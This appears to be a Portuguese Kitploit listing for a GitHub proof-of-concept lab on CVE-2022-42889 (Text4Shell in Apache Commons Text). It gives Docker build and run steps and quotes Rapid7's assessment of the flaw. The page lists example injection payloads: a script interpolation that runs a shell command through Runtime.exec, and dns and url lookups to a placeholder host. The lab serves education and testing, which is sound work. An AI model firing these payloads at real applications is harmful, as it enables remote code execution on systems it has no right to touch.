Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-42889 — docker para CVE-2022-42889 | Kitploit
Ferramentas/GitHubGitHub/necroteddy/cve-2022-42889
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

docker para CVE-2022-42889

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-42889-POC

Um aplicativo de demonstração simples que mostra como explorar a vulnerabilidade CVE-2022-42889.
Utiliza serviços OOB (Out of Band) para demonstrar os prefixos dns e url.

JavaDocs para interpolação de commons-text commons-text JavaDocs

Exemplos de interpolações

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Citação da Rapid7

A vulnerabilidade foi comparada ao Log4Shell por ser uma vulnerabilidade em uma biblioteca de código aberto que provavelmente afetará uma grande variedade de aplicações de software que utilizam o objeto relevante.
No entanto, a análise inicial indica que essa é uma comparação ruim. A natureza da vulnerabilidade faz com que, ao contrário do Log4Shell, seja raro que uma aplicação use o componente vulnerável do Commons Text para processar entradas não confiáveis e potencialmente maliciosas.

Pré-requisitos

  • docker
  • java
  • maven

Java e maven podem ser ignorados se você obtiver a imagem do Docker Hub

Uso

Compilar a aplicação

root@kitploit:~
mvn clean package

Criar a imagem docker

root@kitploit:~
docker build -t cve-2022-42889-poc .

Executar a imagem docker

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

Acesse a aplicação e siga as instruções

root@kitploit:~
open http://localhost:8081

Mais informações

  • NIST NVD
  • Rapid 7
Baixar ferramenta